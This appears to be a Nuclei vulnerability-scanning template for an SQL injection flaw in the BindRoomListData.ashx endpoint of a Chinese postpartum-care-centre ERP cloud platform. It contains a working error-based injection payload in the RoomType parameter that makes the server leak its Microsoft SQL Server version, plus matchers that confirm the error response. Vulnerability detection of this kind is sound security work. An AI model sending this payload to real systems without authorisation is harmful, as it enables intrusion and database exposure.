id: yueziERP-BindRoomListData_ashx-sql

info:
  name: 月子会所ERP管理云平台 BindRoomListData.ashx SQL注入漏洞
  author: xxx
  severity: high
  tags: sql injection

http:
  - raw:
      - |
        GET /Page/SalerManager/ashx/BindRoomListData.ashx?RZParam=1&RoomID=1&RoomName=1&RoomStyle=1&RoomType=1'%20and%201%3dconvert(int,@@version)--&ddlFStoreID=1&IsShowCount=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Microsoft SQL'
          - '转换成数据类型 int 时失败'
        condition: and
      - type: status
        status: 
          - 500